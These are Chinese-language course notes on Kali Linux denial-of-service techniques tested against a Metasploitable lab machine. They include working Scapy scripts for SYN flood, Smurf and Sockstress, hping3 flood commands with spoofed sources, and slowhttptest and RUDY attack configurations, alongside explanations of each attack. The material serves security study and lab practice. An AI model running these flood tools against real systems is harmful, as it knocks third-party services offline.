Kali Linux渗透测试——拒绝服务

笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程

一、基本概念

拒绝服务攻击指针对网络协议、应用的缺陷或直接耗尽被攻击对象的资源，使得目标计算机或网络无法提供正常的服务或资源访问，由于拒绝服务攻击通常利用实际存在的僵尸机和IP对目标发起合法请求，因此难以防范。可以从源、手段、目标三个层次进行划分：

• 源：单一（DoS）、众多（DDoS）
• 手段：漏洞利用、资源消耗
• 目标：崩溃系统、崩溃程序、宽带资源上限、协议性能上限、应用性能上限、系统性能上限

二、攻击实现

1.Syn-Flood

原理：

我们先复习下TCP在建立和断开连接过程中，Client和Server的状态变化，如下所示：

图1 TCP建立连接过程状态

Syn-Flood向攻击目标连续、大量发送SYN包，利用三次握手过程中SYN_RCVD -> ESTABLISHED的等待过程，通过占满TCP最大并发连接数实现拒绝服务攻击，原理如下图所示：

图2 Syn-Flood攻击原理

实现：

利用Scapy脚本发包，如下所示：

#!/usr/bin/python
# .*. coding: utf-8 .*.
from scapy.all import *
from random import randint
from thread import start_new_thread
from sys import argv
from time import sleep

if len(argv) != 4:
    print('usage: ./syn_flood.py [ip_address] [port] [threads]')
    print('eg: ./syn_flood.py 114.114.114.114 80 20')
    sys.exit()

ip_address = argv[1]
port = int(argv[2])
threads = int(argv[3])

print('Syn-Flood attack is running, press Ctrl+C to stop...')

def synflood(ip_address, port):
    while 1:
        rand_port = randint(1,65525)
        send(IP(dst = ip_address)/TCP(dport = port,sport = rand_port),verbose = 0)

for x in range(0,threads):
    start_new_thread(synflood, (ip_address, port))

while 1:
	sleep(1)

将Metasploitable当做靶机，对其发起Syn-Flood攻击，然后通过top和netstat观察系统资源消耗情况，刚开始发现靶机TCP并发连接数未增加，用Wireshark抓包发现系统自动回复了RST，如下所示：

添加规则拒绝RST包出站：

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.10.11.128 -j REJECT

成功攻击后利用top命令查看靶机CPU性能，发现未受影响，但是TCP并发连接数已达上限256，此时正常TCP请求无法建立。

拒绝服务攻击常伴随地址欺骗，即伪造IP源（真正的攻击目标），利用僵尸机回包给攻击目标，从而以隐藏攻击者身份。但注意目前ISP边界路由器对进站和出站的源IP有所限制，会导致伪造IP包发送失败。

2.Smurf

原理：

十分原始的DDoS攻击技术，工作在链路层（局域网），向广播地址发送伪造源地址的ICMP echo Request（ping）包，使得局域网内主机都会向发送ping包的源地址发Reply包，从而使其遭受DDoS攻击。

现代操作系统大多已不再响应目标为广播地址的ping包，因此这种攻击方法已几乎失效。

实现：

利用Scapy脚本发包，如下所示：

#!/usr/bin/python
# .*. coding: utf-8 .*.
from scapy.all import *
send(IP(dst="10.10.11.255",src="10.10.11.128")/ICMP(),count=100,verbose=1)

攻击后发现只有网关设备会回应广播的ping包，Wireshark抓包如下：

3.Sockstress

原理：

利用TCP建立连接三步握手过程中的最后Client回复的ACK，其中window为协商的接收窗口大小，将其设置为0，使得Server误以为Client接收窗口已满，以等待数据发送，这样使得攻击目标大量Socket保持ESTABLISHED状态，会消耗攻击目标大量的系统资源。

Sockstress是一种非常有效的DoS攻击方式，单机发起异步攻击，可以使得高配置服务器拒绝服务。最有效的防御方法是采用白名单，但是应用起来不实际，折中对策是限制单位时间内每个IP地址的TCP连接数，但这又对DDoS失效。

实现：

利用Scapy脚本发包，如下所示：

#!/usr/bin/python
# .*. coding: utf-8 .*.
from scapy.all import *
from random import randint
import sys,os,signal,thread,time

if len(sys.argv)!=4:
    print('usage: ./sockstress.py [ip_address] [port] [threads]')
    print('eg: ./sockstress.py 114.114.114.114 80 20')
    sys.exit()

ip_address = sys.argv[1]
port = int(sys.argv[2])
threads = int(sys.argv[3])

def sockstress(ip_address, port):
    while 1:
        try:
        	x = randint(0,65535)
        	response = sr1(IP(dst=ip_address)/TCP(dport=port, sport=x, flags='S'),timeout=3,verbose=0)
        	send(IP(dst=ip_address)/TCP(dport=port,sport=x,flags='A',ack=(response[TCP].seq+1),window=0),verbose=0)
        except:
        	pass

def shutdown(signal, frame):
	print('iptables recover...')
	os.system('iptables -D OUTPUT -p tcp --tcp-flags RST RST -d' + ip_address + ' -j DROP')
	sys.exit()

def start():
	print('iptables change...')
	print('Sockstress attack is running, press Ctrl+C to stop...')
	os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d' + ip_address + ' -j DROP')
	for x in range(0, threads):
		thread.start_new_thread(sockstress, (ip_address, port))

signal.signal(signal.SIGINT, shutdown)
start()
while 1:
	time.sleep(1)

利用脚本攻击Metasploit2靶机80端口，攻击后Wireshark抓包分析正常，netstat分析TCP连接80端口处于ESTABLISHED状态最大280，但是靶机cpu性能并没有受影响，攻击无效，没有查阅到相关解释，困惑中。。。

相反运用C攻击脚本https://github.com/defuse/sockstress可以很好实现DoS攻击，虽然从top性能上分析没有将CPU资源耗尽，但是实际上系统已拒绝提供服务，如ssh、apache均不能正常访问。

git clone https://github.com/defuse/sockstress.git
cd sockstress
make

./sockstress 10.10.11.128:80 eth0 -p payloads/http

4.TearDrop

原理：

IP协议会将超过其最大传输载荷的数据分段传输，接收方利用数据段之间的IPID和数据偏移值进行拼接，TearDrop即利用IP分段之间数据偏移值重叠覆盖，使得操作系统无法处理此类情况而发生蓝屏、重启、卡死等故障。

原理如下图所示，假设数据段需要拆分为两个IP数据包进行传输，第一个IP包已经传输了1480字节数据，正常第二个IP数据包起始位置偏移量应为1481，而TearDrop攻击中偏移量变为1000，这样就导致接收方在拼接接收的两个IP数据包时出现重叠部分，从而导致系统处理错误。

图3 TearDop攻击原理

但是这种攻击方式仅针对早期Windows系统（95、98、3x等），这里只分析原理作为学习参考，实践意义并不大。

5.Hping3

和Scapy一样，几乎可以定制发送任何TCP/IP数据包，命令行参数命令，使用更加方便。

• SYN Flood

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.10.11.128

• ICMP Flood

hping3 -q -n -a 10.10.11.128 --icmp -d 100 --flood 10.10.11.100
# 10.10.11.100是PING包发往的地址
# 10.10.11.128是PING包中源地址，即攻击目标

• UDP Flood

hping3 -a 10.10.11.128 --udp -s 53 -d 100 -p 53 --flood 10.10.11.100
# 攻击UDP 53端口(DNS)
# 10.10.11.100是PING包发往的地址
# 10.10.11.128是PING包中源地址，即攻击目标

• LAND

一种特殊种类的SYN Flood攻击，源地址、目的地址都是攻击目标，攻击目标自己与自己完成TCP三次握手。

hping3 -n -a 10.10.11.128 -S -d 100 -p 80 --flood 10.10.11.128

6.放大攻击

利用协议自身特性，结合IP源地址欺骗，以小流量请求产生大流量回包，利用大量正常工作的主机实现DDoS，适合于放大攻击的协议包括DNS、SNMP、NTP等，这里仅分析其攻击实现原理。

（1）DNS放大攻击

DNS服务端口为UDP 53，攻击原理：伪造源地址为被攻击目标地址，向递归域名查询服务器发起查询，使得DNS服务器成为流量放大和实施攻击者，大量DNS服务器实现DDoS。以dig命令为例，dig ANY google.com @202.106.0.20命令发包数据107bytes，回包数据785bytes，回包流量照比发包放大了7倍。

（2）SNMP放大攻击

SNMP服务端口为UDP 161/162，其工作时由客户端（管理站）向服务端（被管理设备）发起查询请求，所有数据存储在服务端的管理信息数据库中（MIB），攻击原理：伪造源地址为被攻击目标地址，向开启了SNMP服务的设备发送查询请求，使被攻击目标遭受DDoS。

（3）NTP放大攻击

NTP服务端口为UDP 123，用于网络设备时间同步，NTP提供monlist查询功能，监控NTP服务器状况，客户端查询时，NTP服务器返回最后同步时间的600个客户端IP，流量放大约100倍，攻击原理：伪造源地址为被攻击目标地址，向开启了NTP服务且提供monlist查询的设备发送查询请求，使被攻击目标遭受DDoS。

7.应用层DoS

与应用服务进行异常交互时，利用自身存在漏洞耗尽应用或系统的资源，使应用或系统拒绝服务，其中典型且高效的测试方法如慢速DoS攻击：SlowHTTPTest、RUDY。

（1）SlowHTTPTest

• 低带宽应用层慢速DoS攻击（源自Google）
• 最早由Python编写，跨平台支持（Linux、Windows、OSX）
• 尤其擅长攻击Apache、Tomcat

原理：

Slowloris、Slow HTTP POST

• 耗尽应用的并发连接池，类似于HTTP层的Syn-Flood
• HTTP协议默认在服务器全部接收请求之后才开始处理，若客户端发送速度缓慢或不完整，则连接资源始终占用，此类大量并发将导致DoS
• Slowloris：完整的HTTP请求结尾是\r\n\r\n，在攻击中只发送\r\n
• Slow HTTP POST：HTTP头content-length声明比较大的长度，但是body部分缓慢发送

Slow Read Attack

• 与Slowloris、Slow HTTP POST目的相同，都是耗尽应用的并发连接池
• 不同之处在于其请求正常发送，但慢速读取响应数据
• 攻击者调整TCP Window窗口大小，使服务器慢速返回数据

Apache Range Header Attack

• 客户端传输大文件时，体积超过HTTP Body大小限制时进行分段
• 耗尽服务器CPU、内存资源

实现：

可以从GitHub上下载源码git clone https://github.com/shekyan/slowhttptest.git，然后进入slowhttptest目录运行：

./configure
make && make instal 

然后就可以运行命令，具体在man手册里，可参见EXAMPLES，下面用上述四种slowhttptest方法攻击靶机metasploitable2上运行的Apache：

# Slowloris
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://10.10.11.128 -x 24 -p 3

# Slow HTTP POST
slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.11.128 -x 10 -p 3

# Slow Read Attack
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://10.10.11.128 -p 3

# Apache Range Header Attack
slowhttptest -R -u http://10.10.11.128 -t HEAD -c 1000 -a 10 -b 3000 -r 500

经过测试，Slowloris和Slow HTTP POST的攻击效果最好，Slow Read Attack次之，Apache Range Header Attack则无法实现DoS。

另外除了上述下载源码编译后使用命令以外，还可以利用Docker拉取SlowHTTPTest镜像，在新建的容器中使用命令：

# 安装好docker后首先要拉取slowhttptest镜像
docker pull shekyan/slowhttptest

# 然后直接在新建的容器中直接运行命令参数，以Slowloris攻击为例
docker run -it shekyan/slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://10.10.11.128 -x 24 -p 3

（2）RUDY

• R-U-Dead-Yet，慢速应用层HTTP POST攻击，类似SlowHTTPTest
• 手段更绝，每次只传输一个字节的数据
• 针对攻击有表单的WEB页面，攻击时要指定攻击的参数名称

实现：

从https://sourceforge.net/projects/r-u-dead-yet/获取源码，解压后README中有详细介绍，在rudeadyet.conf中配置好攻击目标url以及表单提交的对象参数，以metasploitable2中dvwa登录界面为攻击目标：

[parameters]

URL: http://10.10.11.128/dvwa/login.php
number_of_connections: 500
attack_parameter: username
proxy_addr: ""
proxy_port: 0

然后运行./r-u-dead-yet-v2.2.py开始攻击，效果还是比较好的。

（3）Siege

HTTP/HTTPS压力测试工具，模拟多个用户并发访问请求，可到GitHub下载https://github.com/JoeDog/siege.git或者直接apt install siege安装。

siege -g http://10.10.11.128/dvwa/login.php
# 用HEAD|GET方法向-g指定url发送请求，获取banner信息
 
siege -i -c 1000 http://10.10.11.128 -A http-agent
# -i：模拟Internet上用户的正常请求
# -c：模拟多个用户并发测试
# -A：user-agent头内容
# 可以使用-f参数调用url字典文件，同时测试多个url